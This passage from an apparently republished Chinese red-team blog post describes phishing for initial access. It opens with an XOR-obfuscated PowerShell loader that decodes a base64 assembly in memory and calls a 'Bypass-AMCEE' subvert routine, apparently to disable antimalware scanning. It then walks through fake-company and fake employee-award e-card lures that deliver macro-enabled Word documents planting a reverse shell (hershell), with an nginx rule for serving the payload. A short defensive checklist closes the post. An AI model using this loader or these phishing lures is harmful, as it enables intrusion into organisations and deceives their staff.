,64,64,64,64,67,66,64,73,106,64,98,64,67,105,64,73,76,64,98,118,64,64,64,64,64,64,76,64,64,72,64,64,68,64,83,102,67,113,64,70,118,64,91,80,67,86,64,70,84,64,98,102,67,123,64,70,106,64,99,118,67,116,64,64,64,64,64,64,64,121,64,66,53,64,76,64,64,116,64,69,64,64,77,102,64,118,64,64,64,64,79,102,64,77,64,64,68,64,82,80,67,116,64,73,80,64,91,80,67,120,64,70,53,64,88,80,67,114,64,68,53,64,88,80,67,117,64,70,84,64,64,64,67,66,64,73,106,64,98,64,67,105,64,73,76,64,98,118,64,116,64,70,80,64,99,64,67,114,64,64,64,64,64,64,67,72,64,67,72,64,64,80,67,76,64,70,84,64,91,118,67,105,64,70,118,64,80,118,67,119,64,73,64,64,100,80,67,120,64,70,106,64,91,118,67,110,64,73,80,64,64,64,67,69,64,70,57,64,98,64,67,52,64,73,72,64,96,80,67,111,64,70,102,64,101,64,64,102,64,74,106,64,72,64,64,102,64,69,72,64,76,64,64,121,64,69,106,64,64,64,64,112,64,64,68,64,64,80,67,76,64,70,84,64,91,118,67,105,64,70,118,64,87,64,67,120,64,70,68,64,91,64,67,109,64,70,49,64,88,80,67,120,64,70,114,64,98,118,64,64,64,64,64,64,64,64,64,64,64,69,53,64,66,118,64,67,64,68,57,64,98,102,67,113,64,70,98,64,96,80,67,116,64,70,68,64,99,64,67,70,64,70,106,64,99,64,67,109,64,70,53,64,88,80,67,117,64,70,84,64,64,64,67,66,64,73,106,64,98,64,67,105,64,73,76,64,98,118,64,116,64,70,80,64,99,64,67,114,64,64,64,64,64,64,64,116,64,64,98,64,64,80,67,80,64,73,72,64)

$g = @(99,118,67,106,64,73,84,64,88,118,67,49,64,68,53,64,88,80,67,117,64,70,84,64,64,64,64,64,64,68,72,64,100,80,67,118,64,70,68,64,98,118,67,123,64,64,64,64,64,64,64,49,64,64,102,64,64,80,67,80,64,73,72,64,99,118,67,106,64,73,84,64,88,118,67,49,64,71,88,64,91,80,67,120,64,73,76,64,96,80,67,119,64,70,53,64,64,64,64,121,64,66,53,64,76,64,64,116,64,69,64,64,77,102,64,118,64,64,64,64,78,64,64,72,64,64,68,64,80,80,67,123,64,73,76,64,91,80,67,117,64,70,72,64,99,64,67,52,64,66,64,64,87,102,67,109,64,73,72,64,98,118,67,113,64,70,57,64,99,102,64,64,64,69,68,64,77,102,64,118,64,66,53,64,76,64,64,116,64,69,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,72,64,64,64,69,64,64,64,64,64,118,57,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,60,60)

$xorencrypted = $a + $b + $c + $d + $e + $f + $g

$decrypted = @()

foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }

$base64string = [Text.Encoding]::UTF8.GetString($decrypted)

function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]”Bypass.AMCEE”).Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }

Bypass-AMCEE

## 攻击活动1:伪造的公司,目的性的提交表格。
我们向目标发送邮件去咨询新业务,在我们的域名上也做一个公司的页面,和他们的业务相似,在使用Dropbox和其他文件托管服务来存放payload都失败后,我们选择了mixmax.com,还可以跟踪谁点击了文件。
电子邮件发送给销售代表:

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221205526.png)

带有宏的恶意word文档,需要宏才能正确加载:

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221205546.png)

一旦启用的话,我们的hershell就会植入进去。

## 攻击活动2 群发活动
由于我们的攻击活动是在新年期间,我们用这个作为幌子宣传,模拟了一个优秀员工奖励计划,http://appreciatehub.com/,我们自己的是http://appreciateservices.com/,别人访问的时候,回跳转到真实的站点:http://octanner.com./,如果长期这么干,自己的域名可能会被标记为恶意域名。最好使用网站克隆。电子贺卡是很个性化的,来自接收着的样图。

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221210229.png)

我们将祝贺视频放到word中,然后需要宏才能播放。

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221210312.png)

配置一下nginx规则:

location /receivedECard {

alias /var/www/html/HappyNewYear2019.docm;

add_header Content-Disposition ‘attachment; filename=”Happy New Year 2019.docm”‘;

}

```

成功获得初始访问权限

Red Team Techniques-通过钓鱼攻击获得访问权限

蓝队如何防守

  • 禁用宏
  • 不接受不信任来源的邮件
  • 虚拟机中运行附件
  • 安全意识培训
  • 收件箱的规则加强

以上所述就是小编给大家介绍的《Red Team Techniques-通过钓鱼攻击获得访问权限》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Writing Apache Modules with Perl and C

Writing Apache Modules with Perl and C

Lincoln Stein、Doug MacEachern / O'Reilly Media, Inc. / 1999-03 / USD 39.95

Apache is the most popular Web server on the Internet because it is free, reliable, and extensible. The availability of the source code and the modular design of Apache makes it possible to extend Web......一起来看看 《Writing Apache Modules with Perl and C》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具